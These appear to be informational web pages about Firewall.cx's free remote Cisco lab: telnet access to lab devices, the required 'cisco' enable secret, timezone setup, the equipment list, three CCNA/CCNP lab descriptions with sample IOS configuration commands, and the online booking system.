2) Manually initiating a telnet session. On each diagram, note the device port list in the lower left-hand corner. These are the ports you need to telnet into in order to access the equipment your lab consists of. You can either use a program of your choice, or open a traditional DOS-based window by clicking the "Start" button, selecting "Run" and entering "command" (Windows 95, 98, Me) or "cmd" (Windows 2000, XP, 2003). At the DOS prompt enter:

c:\> telnet ciscolab.no-ip.org xxxx

where 'xxxx' is substituted with the device port number as indicated on the diagram.

For example, if you wanted to connect to a device that uses device port 2003, the required command would be: telnet ciscolab.no-ip.org 2003

You need to repeat this step for each device you need to telnet into.

Cisco 'Secret' Passwords

Each lab requires you to set the 'enable secret' password. It is imperative that you use the word "cisco", so our automated system is able to reset the equipment for the next user.

We ask that you kindly respect this request to ensure our labs are accessible and usable by everyone.

Since all access attempts are logged by our system, users found storing other 'enable secret' passwords will be blocked from the labs and site in general.

To report any errors or inconsistencies with regards to our lab system, please use the Cisco lab forum.

With your help, we can surely create the world's friendliest and most resourceful Free Cisco Lab!

  • Hits: 14189

Firewall.cx Free Cisco Lab: Setting Your Account GMT Timezone

Firewall.cx's Free Cisco Labs make use of a complex system in order to allow users from all over the world to create a booking in their local timezone. A prerequisite for a successful booking is that the user has the correct GMT Timezone setting in their Firewall.cx profile, as this is used to calculate and present the current scheduling system in the user's local time.

If you are unsure what GMT Timezone you are in, please visit https://greenwichmeantime.com/ and click on your country.

You can check your GMT Timezone by viewing your account profile. This can be easily done by firstly logging into your account and then clicking on "Your Account" from the site's main module:

cisco-lab-gmt-1
Next, click on "Your Info" as shown in the screenshot below:

cisco-lab-gmt-2

 

Finally, scroll down to the 'Forums Timezone' setting and click on the drop-down box to make your selection.

cisco-lab-gmt-3

Once you've selected the correct timezone, scroll to the bottom of the page and click on "Save Changes".

Please note that you will need to adjust your GMT Timezone as you enter and exit daylight saving time throughout the year.

You are now ready to create your Cisco Lab booking!

red-line


Firewall.cx Free Cisco Lab: Equipment & Device List

No lab is possible without the right equipment to allow coverage of simple to complex scenarios.

With limited income and our sponsors' help, we've done our best to populate our lab with the latest models and technologies offered by Cisco. Our current investment exceeds US $10,000, and we will continue to purchase more equipment as our budget permits.

We are proud to present to you the following equipment that will be made available in our lab:

Routers
3 x 1600 series routers including BRI S/T, Serial and Ethernet interfaces
1 x 1720 series router including BRI S/T, Serial and Fast Ethernet interfaces
1 x 2610 series router with BRI S/T, Wic-1T, BRI 4B-S/T and Ethernet interfaces
1 x 2612 series router with BRI S/T, Wic-1T, Ethernet and Token Ring interfaces
1 x 2620 series router with Wic-1T and Fast Ethernet interfaces
2 x 3620 series routers with BRI S/T, Wic-1T, Wic-2T, Ethernet, Fast Ethernet interfaces
1 x 1760 series router supporting Cisco Call Manager Express with Fast Ethernet & Voice Wic
1 x Cisco 2522 Frame relay router simulator
Total: 11 Routers
 
Switches
1 x 1912 Catalyst switch with older menu-driven software
1 x 2950G-12T Catalyst switch with 12 Fast Ethernet ports, 2 Gigabit ports (GBIC)
2 x 3524XL Catalyst switches with 24 Fast Ethernet ports, 2 Gigabit ports (GBIC)
Total: 4 Switches
 
Firewall
1 x PIX 501 Firewall with v6.3 software
 
Other Devices/Equipment
  • GBICs for connections between Catalyst switches
  • Multimode and single-mode fiber optic cables for connections between switches
  • DB60 crossover cables to simulate leased lines
  • 420 VA UPS to ensure lab availability during power outages
  • CAT5 UTP cables & patch cords
  • 256/128K Dedicated ADSL Connection for Lab connectivity

red-line


Firewall.cx Free Cisco Lab: Equipment & Diagrams

Each lab has been designed to cover specific topics of the CCNA & CCNP curriculum, but is in no way limited to them, as you are given the freedom to execute all commands offered by the device's IOS.

While the lab tutorials exist only as guidelines to help you learn how to implement the services and features provided by the equipment, we do not restrict their usage in any way. This effectively means that full control is given to you and, depending on the lab, a multitude of variations to the lab's tutorial are possible.

Cisco Lab No.1 - Basic Router & Switch Configuration

The first Cisco Lab involves the configuration of one Cisco 1603R router and one Catalyst 1912 switch. This equipment has been selected to suit the aim of this lab, which is to serve as an introduction to Cisco technologies and concepts.

The lab is in two parts, the first covering basic IOS functions such as simple router and switch configuration (hostname, interface IP addresses, flash backup, banners etc.).

The second part focuses on ISDN configuration and dialup, including PPP debugging, where the user is required to perform a dialup to an ISP via the lab's ISDN simulator. Basic access lists are covered to enhance the lab further. Lastly, the user is able to ping real Internet IP addresses from the 1603R, as the back-end (ISP) router is connected to the lab's Internet connection.
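
As a rough sketch of the first part's tasks, the lines below show a hostname, banner and interface IP address being configured (the hostname and addressing are examples only and do not reflect the lab's actual configuration):

Router> enable
Router# configure terminal
Router(config)# hostname Lab1-R1
Lab1-R1(config)# banner motd # Firewall.cx Cisco Lab 1 #
Lab1-R1(config)# interface ethernet 0
Lab1-R1(config-if)# ip address 192.168.1.1 255.255.255.0
Lab1-R1(config-if)# no shutdown
Lab1-R1(config-if)# end
Lab1-R1# copy running-config startup-config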

cisco-lab-diagrams-lab-1

 

Equipment Configuration:

Cisco Catalyst 1912
FLASH: 1MB
IOS Version: v8.01.02 Standard Edition
Interfaces:12 Ethernet / 2 Fast Ethernet

 

Cisco 1603R
DRAM / FLASH: 16MB / 16MB
IOS Version: 12.3(22)
Interfaces: 1 Ethernet / 1 Serial / 1 ISDN BRI

red-line

Cisco Lab No.2 - Advanced Router Configuration

The second Cisco lab focuses on advanced router configuration, covering topics such as WAN connectivity (leased lines) with ISDN backup functionality. GRE tunnels, DHCP services and a touch of dynamic routing protocols such as RIPv2 are also included.

As you can appreciate, the complexity here is greater, so the lab is split into four separate tutorials to ensure you get the most out of each one.

You will utilise all three interfaces available on the routers: Ethernet, ISDN and Serial. The primary WAN link is simulated using a back-to-back serial cable, and the ISDN backup capability is provided through our lab's dedicated ISDN simulator.
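
As a rough illustration of the type of configuration covered in this lab, the lines below sketch a GRE tunnel with RIPv2 advertising its network (all interface names and IP addresses are examples only and do not reflect the lab's actual addressing):

Router(config)# interface tunnel 0
Router(config-if)# ip address 172.16.0.1 255.255.255.252
Router(config-if)# tunnel source serial 0
Router(config-if)# tunnel destination 10.0.0.2
Router(config-if)# exit
Router(config)# router rip
Router(config-router)# version 2
Router(config-router)# network 172.16.0.0
Router(config-router)# network 192.168.1.0
Router(config-router)# no auto-summary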

cisco-lab-diagrams-lab-2

 

Equipment Configuration:

Cisco 1603R (router 1)
DRAM / FLASH: 18MB / 16MB
IOS Version: 12.3(6a)
Interfaces: 1 Ethernet / 1 Serial / 1 ISDN BRI

 

Cisco 1603 (router 2)
DRAM / FLASH: 24MB / 16MB
IOS Version: 12.3(6a)
Interfaces: 1 Ethernet / 1 Serial / 1 ISDN BRI

red-line

Cisco Lab No.3 - VLANs - VTP & InterVLAN Routing

The third Cisco lab aims to cover the popular VLAN & InterVLAN routing services, which are becoming very common in large complex networks.

The lab consists of two Catalyst 3500XL switches and one Catalyst 2950G as backbone switches, attached to a Cisco 2620 router.

Our third lab has been designed to fully support the latest advanced services offered by Cisco switches such as the creation of VLANs and configuration of the popular InterVLAN Routing service amongst all VLANs and switches.

Advanced VLAN features, such as the VLAN Trunking Protocol (VTP) and trunk links throughout the backbone switches, are tightly integrated into the lab's specifications and extend to support a number of VLAN-related services, just as they would in a real-world environment.

Further extending this lab's potential, we've added EtherChannel support, allowing you to gain experience in creating high-bandwidth links between switches by aggregating multiple lower-bandwidth (100Mbps) interfaces into one large pipe (400Mbps in our example).

Lastly, STP (Spanning Tree Protocol) is fully supported. The lab guides you in using STP to create fully redundant connections between backbone switches. You are able to disable backbone links, simulating link loss, and monitor STP as it activates previously blocked links.

cisco-lab-diagrams-lab-3

This lab requires you to perform the following tasks:

- Basic & advanced VLAN configuration

- Trunk & Access link configuration

- VLAN Database configuration

- VTP (VLAN Trunking Protocol) server, client and transparent mode configuration

- InterVLAN routing using a 2620 router (Router on a stick)

- EtherChannel link configuration

- Simple STP configuration, Per VLAN STP Plus (PVST+) & link recovery
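
For illustration, here is a minimal sketch of the switch- and router-side commands involved in router-on-a-stick InterVLAN routing (VLAN numbers, interface names and IP addresses are examples only, and exact syntax may vary slightly between the switch models used in this lab):

Switch# vlan database
Switch(vlan)# vlan 10 name SALES
Switch(vlan)# exit
Switch# configure terminal
Switch(config)# interface fastethernet 0/1
Switch(config-if)# switchport mode access
Switch(config-if)# switchport access vlan 10
Switch(config-if)# interface fastethernet 0/12
Switch(config-if)# switchport mode trunk
Switch(config-if)# end

Router(config)# interface fastethernet 0/0.10
Router(config-subif)# encapsulation dot1q 10
Router(config-subif)# ip address 192.168.10.1 255.255.255.0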

 

Equipment Configuration:

Cisco 2620 (router 1)
DRAM / FLASH: 48MB / 32MB
IOS Version: 12.2(5d)
Interfaces: 1 Fast Ethernet
 
Cisco Catalyst 3500XL (switch 1)
DRAM / FLASH: 8MB / 4MB
IOS Version: 12.0(5.2)XU - Enterprise Edition Software
Interfaces: 24 Fast Ethernet / 2 Gigabit Ethernet with SX GBIC modules installed
 
Cisco Catalyst 3500XL (switch 2)
DRAM / FLASH: 8MB / 4MB
IOS Version: 12.0(5.4)WC(1) - Enterprise Edition Software
Interfaces: 24 Fast Ethernet / 2 Gigabit Ethernet with SX & LX GBIC modules installed
 
Cisco Catalyst 2950G-12-EI (switch 3)
DRAM / FLASH: 20MB / 8MB
IOS Version: 12.1(6)EA2
Interfaces: 12 Fast Ethernet / 2 Gigabit Ethernet with SX & LX GBIC modules installed

Firewall.cx Free Cisco Lab: Online Booking System


The Online Booking System is the first step required for any user wishing to access our lab. The process is fairly straightforward and designed so that even novice users can follow it without problems.

How Does It Work?

To make a valid booking on our system you must be a registered Firewall.cx user. Existing users are able to access the Online Booking System from inside their Firewall.cx account.

Once registered, you will be able to log into your Firewall.cx account and access the Online Booking System.

The Online Booking System was customised to suit our lab's needs and provide a booking schedule for all resources (labs) available to our community. Once logged in, you are able to select the resource (lab) you wish to access, check its availability and finally proceed with your booking.

There are a number of parameters that govern the use of our labs to ensure fair usage and avoid abuse of this free service. The maximum session time for each lab depends on its complexity: naturally, the more complex the lab, the more time you will be allowed. When your time has expired, you will automatically be logged off and the lab equipment will be reset for the next scheduled user.

Below are a number of screenshots showing how a booking is created. You will also find the user's control panel, from which you can perform all the functions described here.

Full instructions are always available via the 'Help' link located in the upper right corner of the booking system's page.

The Online Booking System login page:

cisco-lab-booking-system-1

red-line

 

The booking system control panel:

cisco-lab-booking-system-2

red-line

The lab scheduler/calendar:

cisco-lab-booking-system-3

red-line

Creating a booking:

cisco-lab-booking-system-4

red-line

User control panel showing current reservations:

cisco-lab-booking-system-5

red-line
